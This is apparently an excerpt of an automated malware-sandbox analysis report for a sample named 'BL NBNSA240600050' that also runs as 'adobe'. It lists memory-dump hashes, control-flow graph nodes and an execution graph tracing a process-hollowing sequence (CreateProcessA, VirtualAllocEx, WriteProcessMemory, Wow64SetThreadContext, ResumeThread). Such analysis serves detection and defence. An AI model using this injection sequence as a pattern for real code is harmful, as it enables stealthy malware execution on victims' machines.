                                    • Instruction Fuzzy Hash: 42122A31E012198FDB64DF69D954AAEB7F2BF88300F208569D40AAB365DB34DD85CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: 5b5df1c3ec0690674af151b5aa660fe38c07de63ef30edad094092e79d71ba3b
                                    • Instruction ID: ccfe4fb8e8ce36802e065710970c74730ec97ce519fb302d695a14679a3e064a
                                    • Opcode Fuzzy Hash: 5b5df1c3ec0690674af151b5aa660fe38c07de63ef30edad094092e79d71ba3b
                                    • Instruction Fuzzy Hash: 45917231A10209DFDB64EFA8E654BAEBBF6BF44300F208529E40197799DB789D45CBD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: ccb1f3565232a0dcc8f9329db600250994de6d47f90b07567cb6257a54823571
                                    • Instruction ID: 0c9b849cb44b306a602a71df88de15b705cec235045306e8b271795867885311
                                    • Opcode Fuzzy Hash: ccb1f3565232a0dcc8f9329db600250994de6d47f90b07567cb6257a54823571
                                    • Instruction Fuzzy Hash: 51F16C34A01208DFDB54EF64D554B6EBBB6FF89300F208529E4059B3A9DB35EC86CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: 66fbecb31c8a9968cedbeae1df8ff263544181806c3bc5e83714065591741048
                                    • Instruction ID: 9cd691678c8c1b98efe59964ca60d8715ac6d406cc4872549009441603898787
                                    • Opcode Fuzzy Hash: 66fbecb31c8a9968cedbeae1df8ff263544181806c3bc5e83714065591741048
                                    • Instruction Fuzzy Hash: A271B0B2E102098FDB68DF65E5906AEF7E6FF84300B118529D0069B398DB71ED49CBC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 12f8c6b069c790dbbc74131f16c16dfa82aa3a9db295d068876e05ce22dc0472
                                    • Instruction ID: c9c9899d7671986575c2fe2d5c8a3006fcbb7ceeedd49e170c01d68bac770c28
                                    • Opcode Fuzzy Hash: 12f8c6b069c790dbbc74131f16c16dfa82aa3a9db295d068876e05ce22dc0472
                                    • Instruction Fuzzy Hash: 5EB14D31A012099FDB64EF68D9507AEB7B2FF85304F248529E4099B395DB35EC86CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0oNp$DqNp$PHkq$]
                                    • API String ID: 0-3879191310
                                    • Opcode ID: 07636d64dbaa1915655cbaca70217ce0ba9fff2d553470581929d64bfa128ad3
                                    • Instruction ID: e25e3a05c8f0ac43558a245601db4fca1e03e4d81a0ddffb02334dc55dd86d2a
                                    • Opcode Fuzzy Hash: 07636d64dbaa1915655cbaca70217ce0ba9fff2d553470581929d64bfa128ad3
                                    • Instruction Fuzzy Hash: F0814A357101018FCB94DF28E994A6EBBE2EF89310B2585A9E406DF375DB35EC45CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRkq$LRkq$$kq$$kq
                                    • API String ID: 0-2392252538
                                    • Opcode ID: 8a60a34a0106435a2d7ba9375907f8ccffb4ba33768ac68b870d29eccee18516
                                    • Instruction ID: 58d9f4b8338319762f3ebddd7cd5fabce8d4fabbd7bc691b7bede654476452f9
                                    • Opcode Fuzzy Hash: 8a60a34a0106435a2d7ba9375907f8ccffb4ba33768ac68b870d29eccee18516
                                    • Instruction Fuzzy Hash: EB51A031B002019FDB54EB68E950A6AB7F6FF89300F148569E4069B3A9DB35FC45CBD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: eb001009399bc7a3b726b225607d6373116f3335f935736d84a8e43f686c2f0b
                                    • Instruction ID: f61a0e8ac3d61a533bb69a71d8839c7c3b432bcf197bebce7034a3bfdbb7bcf8
                                    • Opcode Fuzzy Hash: eb001009399bc7a3b726b225607d6373116f3335f935736d84a8e43f686c2f0b
                                    • Instruction Fuzzy Hash: 4F51AF31E102099FCFA4DB64E6806AEB7F2EB85300F24852AD405DB385DB35EC46CB91

                                    Execution Graph

                                    Execution Coverage:10%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:183
                                    Total number of Limit Nodes:14
                                    execution_graph 38142 5c25040 38143 5c2508e DrawTextExW 38142->38143 38145 5c250e6 38143->38145 38359 5c2a920 FindCloseChangeNotification 38360 5c2a987 38359->38360 38352 70b86d8 38353 70b8863 38352->38353 38355 70b86fe 38352->38355 38355->38353 38356 70b4afc 38355->38356 38357 70b8958 PostMessageW 38356->38357 38358 70b89c4 38357->38358 38358->38355 38146 11cb0b8 38150 11cb19f 38146->38150 38158 11cb1b0 38146->38158 38147 11cb0c7 38151 11cb1c1 38150->38151 38152 11cb1e4 38150->38152 38151->38152 38166 11cb448 38151->38166 38170 11cb43a 38151->38170 38152->38147 38153 11cb1dc 38153->38152 38154 11cb3e8 GetModuleHandleW 38153->38154 38155 11cb415 38154->38155 38155->38147 38159 11cb1c1 38158->38159 38160 11cb1e4 38158->38160 38159->38160 38164 11cb448 LoadLibraryExW 38159->38164 38165 11cb43a LoadLibraryExW 38159->38165 38160->38147 38161 11cb1dc 38161->38160 38162 11cb3e8 GetModuleHandleW 38161->38162 38163 11cb415 38162->38163 38163->38147 38164->38161 38165->38161 38167 11cb45c 38166->38167 38168 11cb481 38167->38168 38174 11cabb8 38167->38174 38168->38153 38171 11cb448 38170->38171 38172 11cabb8 LoadLibraryExW 38171->38172 38173 11cb481 38171->38173 38172->38173 38173->38153 38175 11cb608 LoadLibraryExW 38174->38175 38177 11cb681 38175->38177 38177->38168 38361 11c4668 38362 11c467a 38361->38362 38363 11c4686 38362->38363 38365 11c4778 38362->38365 38366 11c479d 38365->38366 38370 11c4878 38366->38370 38374 11c4888 38366->38374 38372 11c48af 38370->38372 38371 11c498c 38371->38371 38372->38371 38378 11c44b0 38372->38378 38375 11c48af 38374->38375 38376 11c498c 38375->38376 38377 11c44b0 CreateActCtxA 38375->38377 38376->38376 38377->38376 38379 11c5918 CreateActCtxA 38378->38379 38381 11c59db 38379->38381 38342 11cd420 38343 11cd466 38342->38343 38346 11cd600 38343->38346 38349 11ccfb0 38346->38349 38350 11cd668 DuplicateHandle 38349->38350 38351 11cd553 38350->38351 38178 70b6a24 38183 70b7321 38178->38183 38198 70b7396 38178->38198 38214 70b7330 38178->38214 38179 70b6914 38184 70b734a 38183->38184 38229 70b7bc2 38184->38229 38234 70b7742 38184->38234 38239 70b7cbd 38184->38239 38244 70b78dd 38184->38244 38249 70b7fee 38184->38249 38254 70b7c2b 38184->38254 38259 70b7b2b 38184->38259 38266 70b7d54 38184->38266 38271 70b7bd4 38184->38271 38276 70b7984 38184->38276 38284 70b7950 38184->38284 38289 70b7a41 38184->38289 38185 70b7352 38185->38179 38199 70b7399 38198->38199 38200 70b7324 38198->38200 38202 70b7b2b 4 API calls 38200->38202 38203 70b7c2b 2 API calls 38200->38203 38204 70b7fee 2 API calls 38200->38204 38205 70b78dd 2 API calls 38200->38205 38206 70b7cbd 2 API calls 38200->38206 38207 70b7742 2 API calls 38200->38207 38208 70b7bc2 2 API calls 38200->38208 38209 70b7a41 2 API calls 38200->38209 38210 70b7950 2 API calls 38200->38210 38211 70b7984 4 API calls 38200->38211 38212 70b7bd4 2 API calls 38200->38212 38213 70b7d54 2 API calls 38200->38213 38201 70b7352 38201->38179 38202->38201 38203->38201 38204->38201 38205->38201 38206->38201 38207->38201 38208->38201 38209->38201 38210->38201 38211->38201 38212->38201 38213->38201 38215 70b734a 38214->38215 38217 70b7b2b 4 API calls 38215->38217 38218 70b7c2b 2 API calls 38215->38218 38219 70b7fee 2 API calls 38215->38219 38220 70b78dd 2 API calls 38215->38220 38221 70b7cbd 2 API calls 38215->38221 38222 70b7742 2 API calls 38215->38222 38223 70b7bc2 2 API calls 38215->38223 38224 70b7a41 2 API calls 38215->38224 38225 70b7950 2 API calls 38215->38225 38226 70b7984 4 API calls 38215->38226 38227 70b7bd4 2 API calls 38215->38227 38228 70b7d54 2 API calls 38215->38228 38216 70b7352 38216->38179 38217->38216 38218->38216 38219->38216 38220->38216 38221->38216 38222->38216 38223->38216 38224->38216 38225->38216 38226->38216 38227->38216 38228->38216 38230 70b7d19 38229->38230 38294 70b60d8 38230->38294 38298 70b60d2 38230->38298 38231 70b7d34 38231->38185 38235 70b776e 38234->38235 38302 70b64f8 38235->38302 38306 70b64ec 38235->38306 38240 70b7ce0 38239->38240 38310 70b6269 38240->38310 38314 70b6270 38240->38314 38241 70b81e0 38245 70b78ec 38244->38245 38247 70b6269 WriteProcessMemory 38245->38247 38248 70b6270 WriteProcessMemory 38245->38248 38246 70b7879 38246->38185 38247->38246 38248->38246 38250 70b7ff4 38249->38250 38318 70b6358 38250->38318 38322 70b6360 38250->38322 38251 70b7e62 38251->38185 38255 70b7c31 38254->38255 38256 70b7d73 38255->38256 38326 70b5be8 38255->38326 38330 70b5bf0 38255->38330 38334 70b61aa 38259->38334 38338 70b61b0 38259->38338 38260 70b7b4d 38261 70b7e90 38260->38261 38264 70b6269 WriteProcessMemory 38260->38264 38265 70b6270 WriteProcessMemory 38260->38265 38261->38185 38264->38260 38265->38260 38267 70b7d73 38266->38267 38268 70b7c42 38266->38268 38268->38266 38269 70b5be8 ResumeThread 38268->38269 38270 70b5bf0 ResumeThread 38268->38270 38269->38268 38270->38268 38272 70b7b62 38271->38272 38273 70b7e90 38272->38273 38274 70b6269 WriteProcessMemory 38272->38274 38275 70b6270 WriteProcessMemory 38272->38275 38273->38185 38274->38272 38275->38272 38277 70b7f8e 38276->38277 38278 70b7991 38276->38278 38280 70b60d8 Wow64SetThreadContext 38277->38280 38281 70b60d2 Wow64SetThreadContext 38277->38281 38279 70b7e62 38278->38279 38282 70b6358 ReadProcessMemory 38278->38282 38283 70b6360 ReadProcessMemory 38278->38283 38279->38185 38280->38278 38281->38278 38282->38279 38283->38279 38285 70b78ec 38284->38285 38286 70b7879 38284->38286 38287 70b6269 WriteProcessMemory 38285->38287 38288 70b6270 WriteProcessMemory 38285->38288 38286->38185 38287->38286 38288->38286 38290 70b7a47 38289->38290 38291 70b7e62 38290->38291 38292 70b6358 ReadProcessMemory 38290->38292 38293 70b6360 ReadProcessMemory 38290->38293 38291->38185 38292->38291 38293->38291 38295 70b611d Wow64SetThreadContext 38294->38295 38297 70b6165 38295->38297 38297->38231 38299 70b611d Wow64SetThreadContext 38298->38299 38301 70b6165 38299->38301 38301->38231 38303 70b6581 38302->38303 38303->38303 38304 70b66e6 CreateProcessA 38303->38304 38305 70b6743 38304->38305 38307 70b64f8 CreateProcessA 38306->38307 38309 70b6743 38307->38309 38311 70b6270 WriteProcessMemory 38310->38311 38313 70b630f 38311->38313 38313->38241 38315 70b62b8 WriteProcessMemory 38314->38315 38317 70b630f 38315->38317 38317->38241 38319 70b63ab ReadProcessMemory 38318->38319 38321 70b63ef 38319->38321 38321->38251 38323 70b63ab ReadProcessMemory 38322->38323 38325 70b63ef 38323->38325 38325->38251 38327 70b5bf0 ResumeThread 38326->38327 38329 70b5c61 38327->38329 38329->38255 38331 70b5c30 ResumeThread 38330->38331 38333 70b5c61 38331->38333 38333->38255 38335 70b61b0 VirtualAllocEx 38334->38335 38337 70b622d 38335->38337 38337->38260 38339 70b61f0 VirtualAllocEx 38338->38339 38341 70b622d 38339->38341 38341->38260

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 294 8aa30f8-8aa312a 296 8aa3658-8aa3676 294->296 297 8aa3130-8aa31c4 294->297 300 8aa3a71-8aa3a7d 296->300 321 8aa31d0-8aa3227 297->321 322 8aa31c6-8aa31ca 297->322 302 8aa3a83 300->302 303 8aa3684-8aa3690 300->303 306 8aa3a95-8aa3a9c 302->306 304 8aa3696-8aa3716 303->304 305 8aa3a85-8aa3a8a 303->305 324 8aa3718-8aa371e 304->324 325 8aa372e-8aa3747 304->325 305->306 349 8aa322d-8aa3235 321->349 350 8aa35a2-8aa35c6 321->350 322->321 327 8aa3722-8aa3724 324->327 328 8aa3720 324->328 331 8aa3749-8aa3772 325->331 332 8aa3777-8aa37b5 325->332 327->325 328->325 342 8aa3a6e 331->342 345 8aa37da-8aa37e7 332->345 346 8aa37b7-8aa37d8 332->346 342->300 358 8aa37ee-8aa37f4 345->358 346->358 352 8aa323c-8aa3244 349->352 353 8aa3237-8aa323b 349->353 359 8aa364a-8aa3656 350->359 356 8aa3249-8aa326b 352->356 357 8aa3246 352->357 353->352 366 8aa326d 356->366 367 8aa3270-8aa3276 356->367 357->356 360 8aa3813-8aa3865 358->360 361 8aa37f6-8aa3811 358->361 359->296 395 8aa386b-8aa3870 360->395 396 8aa3980-8aa39bf 360->396 361->360 366->367 369 8aa327c-8aa3296 367->369 370 8aa3525-8aa3530 367->370 371 8aa32db-8aa32e4 369->371 372 8aa3298-8aa329c 369->372 375 8aa3532 370->375 376 8aa3535-8aa356c 370->376 379 8aa32ea-8aa32fa 371->379 380 8aa3645 371->380 372->371 378 8aa329e-8aa32a9 372->378 375->376 410 8aa359a 376->410 411 8aa356e-8aa3598 376->411 382 8aa32af 378->382 383 8aa3337-8aa33e4 378->383 379->380 381 8aa3300-8aa3311 379->381 380->359 381->380 386 8aa3317-8aa3327 381->386 387 8aa32b2-8aa32b4 382->387 397 8aa33e6 383->397 398 8aa33f4-8aa34bc 383->398 386->380 389 8aa332d-8aa3334 386->389 390 8aa32ba-8aa32c5 387->390 391 8aa32b6 387->391 389->383 390->380 394 8aa32cb-8aa32d7 390->394 391->390 394->387 400 8aa32d9 394->400 402 8aa387a-8aa387d 395->402 416 8aa39db-8aa39ea 396->416 417 8aa39c1-8aa39d9 396->417 397->398 401 8aa33e8-8aa33ee 397->401 418 8aa35cb-8aa35dd 398->418 419 8aa34c2-8aa34c6 398->419 400->383 401->398 406 8aa3948-8aa3970 402->406 407 8aa3883 402->407 420 8aa3976-8aa397a 406->420 412 8aa388a-8aa38b6 407->412 413 8aa391a-8aa3946 407->413 414 8aa38bb-8aa38e7 407->414 415 8aa38ec-8aa3918 407->415 410->350 411->410 412->420 413->420 414->420 415->420 421 8aa39f3-8aa3a55 416->421 417->421 418->380 427 8aa35df-8aa35fc 418->427 419->418 423 8aa34cc-8aa34db 419->423 420->396 420->402 442 8aa3a60-8aa3a67 421->442 429 8aa351b-8aa351f 423->429 430 8aa34dd 423->430 427->380 431 8aa35fe-8aa361a 427->431 429->369 429->370 433 8aa34e3-8aa34e5 430->433 431->380 435 8aa361c-8aa363a 431->435 436 8aa34ef-8aa350b 433->436 437 8aa34e7-8aa34eb 433->437 435->380 438 8aa363c 435->438 436->380 440 8aa3511-8aa3519 436->440 437->436 438->380 440->429 440->433 442->342
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq$TJpq$Tekq$poq$xbnq
                                    • API String ID: 0-2301093937
                                    • Opcode ID: dcfcb93abc633d31184433488a447040d05cafa9c4e37eb4974b169b2c70b2df
                                    • Instruction ID: 7bff665a0fb6d84d7a47d6936b6d136a67692bdc2379598aae87f458f1e0cc64
                                    • Opcode Fuzzy Hash: dcfcb93abc633d31184433488a447040d05cafa9c4e37eb4974b169b2c70b2df
                                    • Instruction Fuzzy Hash: E4621575A00618DFDB14DFA8C984B69BBB2FF48305F1581A8E509AB766DB31EC52CF40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 443 70b64ec-70b658d 446 70b658f-70b6599 443->446 447 70b65c6-70b65e6 443->447 446->447 448 70b659b-70b659d 446->448 454 70b65e8-70b65f2 447->454 455 70b661f-70b664e 447->455 449 70b659f-70b65a9 448->449 450 70b65c0-70b65c3 448->450 452 70b65ab 449->452 453 70b65ad-70b65bc 449->453 450->447 452->453 453->453 456 70b65be 453->456 454->455 457 70b65f4-70b65f6 454->457 463 70b6650-70b665a 455->463 464 70b6687-70b6741 CreateProcessA 455->464 456->450 459 70b6619-70b661c 457->459 460 70b65f8-70b6602 457->460 459->455 461 70b6606-70b6615 460->461 462 70b6604 460->462 461->461 465 70b6617 461->465 462->461 463->464 466 70b665c-70b665e 463->466 475 70b674a-70b67d0 464->475 476 70b6743-70b6749 464->476 465->459 468 70b6681-70b6684 466->468 469 70b6660-70b666a 466->469 468->464 470 70b666e-70b667d 469->470 471 70b666c 469->471 470->470 473 70b667f 470->473 471->470 473->468 486 70b67d2-70b67d6 475->486 487 70b67e0-70b67e4 475->487 476->475 486->487 488 70b67d8 486->488 489 70b67e6-70b67ea 487->489 490 70b67f4-70b67f8 487->490 488->487 489->490 491 70b67ec 489->491 492 70b67fa-70b67fe 490->492 493 70b6808-70b680c 490->493 491->490 492->493 496 70b6800 492->496 494 70b681e-70b6825 493->494 495 70b680e-70b6814 493->495 497 70b683c 494->497 498 70b6827-70b6836 494->498 495->494 496->493 500 70b683d 497->500 498->497 500->500
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B672E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: $F6A$$F6A
                                    • API String ID: 963392458-1049683302
                                    • Opcode ID: 2f912a4662549f425d21746749dc5da2550f2caa9035006918f9aacbeedc8c15
                                    • Instruction ID: 3a33e10ff58933329cd10fd2cd502afa489d22b549bd7e2e0a71beda6ab4f9cc
                                    • Opcode Fuzzy Hash: 2f912a4662549f425d21746749dc5da2550f2caa9035006918f9aacbeedc8c15
                                    • Instruction Fuzzy Hash: B5A14CB1D0021ADFDB24CF68C840BDDBBF2BF48314F1486A9D849A7254DB759A85CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 501 70b64f8-70b658d 503 70b658f-70b6599 501->503 504 70b65c6-70b65e6 501->504 503->504 505 70b659b-70b659d 503->505 511 70b65e8-70b65f2 504->511 512 70b661f-70b664e 504->512 506 70b659f-70b65a9 505->506 507 70b65c0-70b65c3 505->507 509 70b65ab 506->509 510 70b65ad-70b65bc 506->510 507->504 509->510 510->510 513 70b65be 510->513 511->512 514 70b65f4-70b65f6 511->514 520 70b6650-70b665a 512->520 521 70b6687-70b6741 CreateProcessA 512->521 513->507 516 70b6619-70b661c 514->516 517 70b65f8-70b6602 514->517 516->512 518 70b6606-70b6615 517->518 519 70b6604 517->519 518->518 522 70b6617 518->522 519->518 520->521 523 70b665c-70b665e 520->523 532 70b674a-70b67d0 521->532 533 70b6743-70b6749 521->533 522->516 525 70b6681-70b6684 523->525 526 70b6660-70b666a 523->526 525->521 527 70b666e-70b667d 526->527 528 70b666c 526->528 527->527 530 70b667f 527->530 528->527 530->525 543 70b67d2-70b67d6 532->543 544 70b67e0-70b67e4 532->544 533->532 543->544 545 70b67d8 543->545 546 70b67e6-70b67ea 544->546 547 70b67f4-70b67f8 544->547 545->544 546->547 548 70b67ec 546->548 549 70b67fa-70b67fe 547->549 550 70b6808-70b680c 547->550 548->547 549->550 553 70b6800 549->553 551 70b681e-70b6825 550->551 552 70b680e-70b6814 550->552 554 70b683c 551->554 555 70b6827-70b6836 551->555 552->551 553->550 557 70b683d 554->557 555->554 557->557
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B672E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: $F6A$$F6A
                                    • API String ID: 963392458-1049683302
                                    • Opcode ID: 322b348a40d35d1ef771261f7f409bcc1139e6237634bdffe41439f2ca75cbdb
                                    • Instruction ID: d448cae3d3046246dfd2466cad64e43f53a2d51e7494864fb446a220755a12e4
                                    • Opcode Fuzzy Hash: 322b348a40d35d1ef771261f7f409bcc1139e6237634bdffe41439f2ca75cbdb
                                    • Instruction Fuzzy Hash: AF913CB1D0021ADFDB24CFA8C940BDDBBF2BF48314F1486A9D809A7254DB759A85CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 558 8aa0d58-8aa0d84 560 8aa0d8a-8aa0de2 call 8aa0acc 558->560 561 8aa0f9c-8aa10d2 558->561 624 8aa0de4 call 8aa11a8 560->624 625 8aa0de4 call 8aa119f 560->625 577 8aa10db-8aa10e4 561->577 578 8aa10d4-8aa10da 561->578 579 8aa1116-8aa1133 577->579 580 8aa10e6-8aa1114 577->580 578->577 587 8aa113e-8aa1142 579->587 600 8aa1166-8aa1176 579->600 580->587 582 8aa0dea-8aa0dee 585 8aa0ea0-8aa0f26 582->585 586 8aa0df4-8aa0e00 582->586 619 8aa0f2d-8aa0f36 585->619 586->585 593 8aa0e06-8aa0e15 586->593 589 8aa114f-8aa1153 587->589 590 8aa1144-8aa1147 587->590 594 8aa1163-8aa1164 589->594 595 8aa1155-8aa1159 589->595 590->589 605 8aa0e1d-8aa0e24 593->605 594->600 595->594 597 8aa115b 595->597 597->594 602 8aa1178 600->602 603 8aa117d-8aa1184 600->603 602->603 608 8aa0e40-8aa0e9b 605->608 609 8aa0e26-8aa0e38 605->609 608->619 609->608 622 8aa0f38 619->622 623 8aa0f40 619->623 622->623 623->561 624->582 625->582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $F6A$$F6A$(oq$Hoq
                                    • API String ID: 0-1823700412
                                    • Opcode ID: 7c994c9f32ab6d5fe7765df70edd0e53df75e64c6f5a37b2ae41bc49324bd79d
                                    • Instruction ID: c8c9d65c458ffa079e4b4f7813b1b9db4de1a21360b6fa115db0c970ff402380
                                    • Opcode Fuzzy Hash: 7c994c9f32ab6d5fe7765df70edd0e53df75e64c6f5a37b2ae41bc49324bd79d
                                    • Instruction Fuzzy Hash: 95B19E71E002089FDB14DFA9C5947AEBBF6FF88300F24842EE406AB794DB749946CB55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 626 8aa4a3e-8aa4ad4 636 8aa4aec-8aa4b45 626->636 637 8aa4ad6-8aa4adc 626->637 645 8aa4b5d-8aa4c28 636->645 646 8aa4b47-8aa4b4d 636->646 638 8aa4ade 637->638 639 8aa4ae0-8aa4ae2 637->639 638->636 639->636 660 8aa4c2e-8aa4c9c 645->660 647 8aa4b4f 646->647 648 8aa4b51-8aa4b53 646->648 647->645 648->645
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 6c01ec6b42f194e634736ebda36a094b4ec89954dc2eca2952cca7b14d786c70
                                    • Instruction ID: 9e8bbc70207860065dbefbeed12cb33c697253c8beaedc46c03e3cd81f552797
                                    • Opcode Fuzzy Hash: 6c01ec6b42f194e634736ebda36a094b4ec89954dc2eca2952cca7b14d786c70
                                    • Instruction Fuzzy Hash: 885180747002048FD718AB78D955BAE7BF7FB88715F249028F906AB799CE359C02CB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 690 11cb1b0-11cb1bf 691 11cb1eb-11cb1ef 690->691 692 11cb1c1-11cb1ce call 11cab54 690->692 694 11cb1f1-11cb1fb 691->694 695 11cb203-11cb244 691->695 697 11cb1e4 692->697 698 11cb1d0 692->698 694->695 701 11cb246-11cb24e 695->701 702 11cb251-11cb25f 695->702 697->691 745 11cb1d6 call 11cb448 698->745 746 11cb1d6 call 11cb43a 698->746 701->702 703 11cb261-11cb266 702->703 704 11cb283-11cb285 702->704 706 11cb268-11cb26f call 11cab60 703->706 707 11cb271 703->707 709 11cb288-11cb28f 704->709 705 11cb1dc-11cb1de 705->697 708 11cb320-11cb3e0 705->708 713 11cb273-11cb281 706->713 707->713 740 11cb3e8-11cb413 GetModuleHandleW 708->740 741 11cb3e2-11cb3e5 708->741 711 11cb29c-11cb2a3 709->711 712 11cb291-11cb299 709->712 716 11cb2a5-11cb2ad 711->716 717 11cb2b0-11cb2b9 call 11cab70 711->717 712->711 713->709 716->717 721 11cb2bb-11cb2c3 717->721 722 11cb2c6-11cb2cb 717->722 721->722 723 11cb2cd-11cb2d4 722->723 724 11cb2e9-11cb2f6 722->724 723->724 726 11cb2d6-11cb2e6 call 11cab80 call 11cab90 723->726 731 11cb2f8-11cb316 724->731 732 11cb319-11cb31f 724->732 726->724 731->732 742 11cb41c-11cb430 740->742 743 11cb415-11cb41b 740->743 741->740 743->742 745->705 746->705
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 011CB406
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID: $F6A
                                    • API String ID: 4139908857-4072994420
                                    • Opcode ID: 5e2bf4fa24e1eebfc03810457ac6dc3637e297d11310d98534925af4fb9afa65
                                    • Instruction ID: 6c6d446d555ba2382ac0cb4385d6a9bb8764e6c96f054cd8a1d63c18f99b8133
                                    • Opcode Fuzzy Hash: 5e2bf4fa24e1eebfc03810457ac6dc3637e297d11310d98534925af4fb9afa65
                                    • Instruction Fuzzy Hash: 31716670A00B058FD728DF6AD14175ABBF2FF98744F00892ED48ADBA50D735E94ACB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 747 11c590c-11c598c 748 11c598f-11c59d9 CreateActCtxA 747->748 750 11c59db-11c59e1 748->750 751 11c59e2-11c5a3c 748->751 750->751 758 11c5a3e-11c5a41 751->758 759 11c5a4b-11c5a4f 751->759 758->759 760 11c5a60 759->760 761 11c5a51-11c5a5d 759->761 762 11c5a61 760->762 761->760 762->762
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 011C59C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID: $F6A
                                    • API String ID: 2289755597-4072994420
